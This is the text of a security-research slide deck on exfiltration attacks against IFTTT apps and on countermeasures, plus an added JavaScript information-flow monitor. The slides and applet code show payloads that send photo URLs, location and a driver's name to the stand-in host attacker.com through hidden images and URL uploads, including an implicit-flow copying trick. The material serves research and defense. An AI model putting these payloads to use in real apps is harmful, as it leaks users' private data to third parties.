Breaking and Fixing IoT Apps (PowerPoint PPT presentation)


  1. Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia Bastys and Musard Balliu Appeared in CCS’18

  2. Web of Things
     • Internet of Things (IoT): incompatible standards, platforms, technologies
     • “World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT” (W3C CEO Dr. Jeff Jaffe, 2017)
     • Security implications?

  3. IoT apps “Connecting otherwise unconnected services”

  4. IoT apps
     • “Managing users’ digital lives”
     • Smart homes, smartphones, cars, fitness armbands
     • Online services (Google, Dropbox, …)
     • Social networks (Facebook, Twitter, …)
     • End-user programming: anyone can create and publish apps
     • Most apps by third parties
     • Web interface + smartphone clients

  5. IFTTT: “If This Then That”
     • Trigger-action programming
     • Largest IoT app platform
     • Over 500 integrated services
     • Millions of users and billions of running apps

  6. IFTTT app: “If this (Trigger) then that (Action)”. What can go wrong?

  7. Attack by malicious app maker (diagram: If … then …)

  10. IFTTT’s access control
     • If this (Trigger) then that (Action)
     • Filter code is JavaScript, “sandboxed”
     • Users explicitly grant the app access to their services

  11. URLs as universal glue: “Connecting otherwise unconnected services”
     If this (Trigger) then that (Action):
     1. Upload new image file to IFTTT
     2. Put up image under public URL on ifttt.com
     3. Pass URL to Google Drive API for upload to Google

  12. How to exfiltrate secrets?
     • Private information available via APIs
     • Private sources: location, voice commands, images, …
     • Cannot directly exfiltrate from filter code
     • Public sinks?
     • Batch job programs with no I/O
     • “Can load the gun but not pull the trigger…”

  13. URL attacks: “Load the gun and let somebody else pull the trigger”
     • URL upload attack
       PhotoURL
       'https://attacker.com?' + encodeURIComponent(PhotoURL)
     • URL markup attack: include an invisible image
       '<img src=\"https://attacker.com?' + secret + '\" style=\"width:0px;height:0px;\">'

  14. URL upload attack demo

  15. URL markup attack demo

  16. 3rd-party applet attack surface
     • If (trigger side): Privacy
     • then (action side): Integrity & availability

  17. Empirical measurement study
     • Dataset by Mi et al. (May 2017): 279,828 IFTTT apps, with the triggers and actions they use
     • Classification of triggers and actions: Privacy, Integrity & Availability, per category
     • Classification of applets:
       • Private sources & public sink: potential privacy violation
       • High-integrity sink: potential integrity violation
       • Possibility of skipping trigger: potential denial of service
     • 30% of apps potentially vulnerable

  18. IFTTT triggers [chart: number of triggers per category (0–200), each category labelled Private / Available / Public]

  19. IFTTT actions [chart: cumulative number of actions per category (0–180), each category labelled Public / Untrusted / Available]

  20. Potential privacy violations [heat map: trigger category vs. action category, number of apps (0–1000)]

  21. URL shortening attack demo

  22. Countermeasures: break the flow
     • Per-app access control
       • Public app: no private sources
       • Private app: no public sinks
     • Cannot build URLs from strings, only via APIs
     • Output sanitization
     • Authenticated communication: protect resources on CDNs by requiring authentication
     • If public URLs can’t be avoided:
       • Shorten URL lifetime; already done by some CDNs
       • Secure URL shortening: 11–12 chars best practice

  23. Public app (diagram: If … then …)

  24. Private app (diagram: If … then …)

  25. Countermeasures: track the flow
     • Track information flow in the JavaScript filter code (diagram: If … then … with JSFlow in between)
     • Allow flow from public sources to attacker: e.g. logo image with public URL
     • Block flow from private sources to attacker: location leaks prevented
     • JSFlow: information flow tracker for JavaScript, ECMA-262 v.5 support, jsflow.net

  26. Types of flow: explicit
     APPLET TITLE: Automatically back up your new iOS photos to Google Drive
     TRIGGER: Any new photo
     FILTER & TRANSFORM:
        // public URL of the new photo, as provided by the iOS Photos trigger
        var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL);
        // explicit flow: the photo URL is appended to a host chosen by the app maker
        var attack = 'www.attacker.com?' + publicPhotoURL;
        GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack);
     ACTION: Upload file from URL


  28. Types of flow: explicit
     APPLET TITLE: Automatically get an email every time you park your BMW with a map
     TRIGGER: Car is parked
     FILTER & TRANSFORM:
        var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl);
        // legitimate map image, loaded from the location service's own URL
        var locImg = '<img src=\"' + Location.enterOrExitRegionLocation.LocationMapUrl + '\">';
        // invisible image whose request carries the location to the app maker's host
        var attack = '<img src=\"www.attacker.com?' + loc + '\" style=\"width:0px; height:0px;\">';
        var iftttLogo = '<img src=\"www.ifttt.com/logo.png\" style=\"width:100px; height:100px;\">';
        Email.sendMeEmail.setBody('I ' + Location.enterOrExitRegionLocation.EnteredOrExited + ' an area ' + locImg + iftttLogo + attack);
     ACTION: Send me an email


  30. Types of flow: implicit
     APPLET TITLE: Log your completed rides in Google Calendar
     TRIGGER: Ride completed
     FILTER & TRANSFORM:
        var rideMap = Uber.rideCompleted.TripMapImage;
        var driver = Uber.rideCompleted.DriverName;
        var dst = [];
        // no direct assignment from driver to dst: each character is rebuilt by
        // comparing against every printable ASCII code, so the flow is implicit
        for (var i = 0; i < driver.length; i++)
          for (var j = 32; j < 127; j++) {
            var t = driver[i] == String.fromCharCode(j);
            if (t) { dst[i] = String.fromCharCode(j); }
          }
        var attack = '<img src=\"www.attacker.com?' + dst + '\" style=\"width:0px; height:0px;\">';
        GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack);
     ACTION: Quick add event
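The “track the flow” countermeasure of slide 25 applied to the explicit and implicit flows of slides 26–30, as an added example that is not code from the slides or from JSFlow: a toy monitor in which every value carries a label, operations join labels, and a branch on private data raises the program-counter label. Ingredient values are constructed samples.

```javascript
// Added example, not code from the slides or from JSFlow: a toy "track the
// flow" monitor for filter code. Every value carries a label, "public" or
// "private"; operations join labels, and code run under a branch on private
// data raises the program-counter label, so the implicit flow of slide 30
// (copying a secret through comparisons only) is caught as well.
const join = (a, b) => (a === "private" || b === "private") ? "private" : "public";
const lab = (value, label) => ({ value, label });

let pc = "public";                                   // program-counter label
function branch(cond, thenFn) {                      // run thenFn under cond's label
  const saved = pc;
  pc = join(pc, cond.label);
  try { if (cond.value) thenFn(); } finally { pc = saved; }
}
const assign = v => lab(v.value, join(v.label, pc));  // assignment inherits pc
const concat = (...xs) =>
  lab(xs.map(x => x.value).join(""), xs.reduce((l, x) => join(l, x.label), pc));
const encode = x => assign(lab(encodeURIComponent(x.value), x.label));
const eq = (a, b) => lab(a.value === b.value, join(a.label, b.label));

// Sink rule: a URL whose host the app maker chose is attacker-observable,
// so only public data may be appended to it.
function appMakerUrl(host, query) {
  const blocked = query.label === "private";
  return { blocked, url: blocked ? null : host + (query.value ? "?" + query.value : "") };
}

// Constructed sample ingredients (not real IFTTT data), labelled private.
const Location = { LocationMapUrl: lab("https://maps.example/?q=57.7,11.97", "private") };
const Uber = { DriverName: lab("Ann", "private") };

// Slide 25: public logo URL is allowed; slide 28: location leak is blocked.
const logo = appMakerUrl("www.ifttt.com/logo.png", lab("", "public"));
const explicitLeak = appMakerUrl("www.attacker.com", encode(Location.LocationMapUrl));

// Slide 30: rebuild the driver's name by comparisons only. Nothing flows
// from DriverName into dst explicitly, but every append happens under a
// branch on a private comparison, so dst ends up labelled private.
function copyByComparison(secret) {
  let dst = lab("", "public");
  for (let i = 0; i < secret.value.length; i++)      // (loop bound not tracked in this toy)
    for (let j = 32; j < 127; j++) {
      const ch = lab(String.fromCharCode(j), "public");
      branch(eq(lab(secret.value[i], secret.label), ch),
             () => { dst = assign(concat(dst, ch)); });
    }
  return dst;
}
const implicitLeak = appMakerUrl("www.attacker.com", copyByComparison(Uber.DriverName));
```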
